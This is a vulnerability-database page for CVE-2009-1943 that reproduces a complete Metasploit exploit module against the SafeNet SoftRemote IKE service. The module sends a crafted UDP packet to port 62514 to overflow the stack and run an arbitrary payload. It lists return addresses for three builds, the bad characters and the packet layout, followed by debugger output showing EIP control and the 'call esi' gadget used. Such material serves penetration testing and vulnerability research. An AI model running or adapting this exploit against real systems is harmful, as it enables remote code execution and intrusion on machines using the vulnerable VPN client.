Vulners
Lucene search
SafeNet SoftRemote IKE Service Buffer Overflow
| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
 | CVE-2009-1943 | 22 Jun 201000:00 | – | circl |
 | CVE-2009-1943 | 5 Jun 200921:00 | – | cve |
 | CVE-2009-1943 | 5 Jun 200921:00 | – | cvelist |
 | DSquare Exploit Pack: D2SEC_VPNJUN | 5 Jun 200921:30 | – | d2 |
 | SafeNet SoftRemote - IKE Service Buffer Overflow (Metasploit) | 22 Jun 201000:00 | – | exploitdb |
 | Juniper NetScreen VPN Client Multiple Buffer Overflow Vulnerabilities | 25 Sep 201300:00 | – | nessus |
 | KLA10317 ACE vulnerability in SafeNet SoftRemote | 5 Jun 200900:00 | – | kaspersky |
 | SafeNet SoftRemote IKE Service Buffer Overflow | 2 Sep 200922:04 | – | metasploit |
 | CVE-2009-1943 | 5 Jun 200921:30 | – | nvd |
 | Stack overflow | 5 Jun 200921:30 | – | prion |
10
`##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::Udp
def initialize(info = {})
super(update_info(info,
'Name' => 'SafeNet SoftRemote IKE Service Buffer Overflow',
'Description' => %q{
This module exploits a stack overflow in Safenet SoftRemote IKE IreIKE.exe
service. When sending a specially crafted udp packet to port 62514 an
attacker may be able to execute arbitrary code. This module has
been tested with Juniper NetScreen-Remote 10.8.0 (Build 20) using
windows/meterpreter/reverse_ord_tcp payloads.
},
'Author' => [ 'MC' ],
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2009-1943' ],
[ 'OSVDB', '54831' ],
[ 'BID', '35154' ],
[ 'URL', 'http://reversemode.com/index.php?option=com_content&task=view&id=63&Itemid=1' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 213,
'BadChars' => "\x00\x0a\x20\x0d",
'StackAdjustment' => -3500,
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff",
},
'Privileged' => true,
'Platform' => 'win',
'Targets' =>
[
[ 'SafeNet Irelke 10.8.0.20', { 'Ret' => 0x004514a9 } ],
[ 'SafeNet Irelke 10.8.0.10', { 'Ret' => 0x00451889 } ],
[ 'SafeNet Irelke 10.8.3.6', { 'Ret' => 0x00451929 } ],
],
'DisclosureDate' => 'Jun 1 2009',
'DefaultTarget' => 0))
register_options([Opt::RPORT(62514)], self)
end
def exploit
connect_udp
sploit = [0x01000000].pack('V') # IPC packet
sploit << [0x00000033].pack('V') # Exploit this thing using command 0x11 (0x33 - 0x28).
sploit << payload.encoded
sploit << [target.ret].pack('V')
sploit << rand_text_alpha_upper(150)
print_status("Trying target #{target.name}...")
udp_sock.put(sploit)
sleep(5)
handler
disconnect_udp
end
end
=begin
0:013> g
(f7c.fe0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=68413268 ebx=00dcfde8 ecx=00000000 edx=014af53c esi=00dcfdf1 edi=00000000
eip=41316841 esp=014af64c ebp=00000001 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
41316841 ?? ???
0:008> !pattern_offset 300
[Byakugan] Control of eax at offset 217.
[Byakugan] Control of eip at offset 213.
0:008> d esp
014af64c 68 32 41 68 33 41 68 34-41 68 35 41 68 36 41 68 h2Ah3Ah4Ah5Ah6Ah
014af65c 37 41 68 38 41 68 39 41-69 30 41 69 31 41 69 32 7Ah8Ah9Ai0Ai1Ai2
014af66c 41 69 33 41 69 34 41 69-35 41 69 36 41 69 37 41 Ai3Ai4Ai5Ai6Ai7A
014af67c 69 38 41 69 39 41 6a 30-41 6a 31 41 6a 32 41 6a i8Ai9Aj0Aj1Aj2Aj
014af68c 33 41 6a 34 41 6a 35 41-6a 36 41 6a 37 41 6a 38 3Aj4Aj5Aj6Aj7Aj8
014af69c 41 6a 39 41 6b 30 41 6b-31 41 6b 32 41 6b 33 41 Aj9Ak0Ak1Ak2Ak3A
014af6ac 6b 34 41 6b 35 41 6b 36-41 6b 37 41 6b 38 41 6b k4Ak5Ak6Ak7Ak8Ak
014af6bc 39 41 6c 30 41 6c 31 41-6c 32 41 6c 33 41 6c 34 9Al0Al1Al2Al3Al4
0:008> d esi
00dcfdf1 61 30 41 61 31 41 61 32-41 61 33 41 61 34 41 61 a0Aa1Aa2Aa3Aa4Aa
00dcfe01 35 41 61 36 41 61 37 41-61 38 41 61 39 41 62 30 5Aa6Aa7Aa8Aa9Ab0
00dcfe11 41 62 31 41 62 32 41 62-33 41 62 34 41 62 35 41 Ab1Ab2Ab3Ab4Ab5A
00dcfe21 62 36 41 62 37 41 62 38-41 62 39 41 63 30 41 63 b6Ab7Ab8Ab9Ac0Ac
00dcfe31 31 41 63 32 41 63 33 41-63 34 41 63 35 41 63 36 1Ac2Ac3Ac4Ac5Ac6
00dcfe41 41 63 37 41 63 38 41 63-39 41 64 30 41 64 31 41 Ac7Ac8Ac9Ad0Ad1A
00dcfe51 64 32 41 64 33 41 64 34-41 64 35 41 64 36 41 64 d2Ad3Ad4Ad5Ad6Ad
00dcfe61 37 41 64 38 41 64 39 41-65 30 41 65 31 41 65 32 7Ad8Ad9Ae0Ae1Ae2
0:008> s -b 0x00400000 0x0047c000 ff d6
.
.
004514a9 ff d6 8b e8 8d 44 24 10-c7 44 24 10 00 00 00 00 .....D$..D$.....
0:008> u 0x004514a9 L1
IreIKE+0x514a9:
004514a9 ffd6 call esi
=end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
26 Nov 2009 00:00Current
0.5Low risk
Vulners AI Score0.5
EPSS0.79234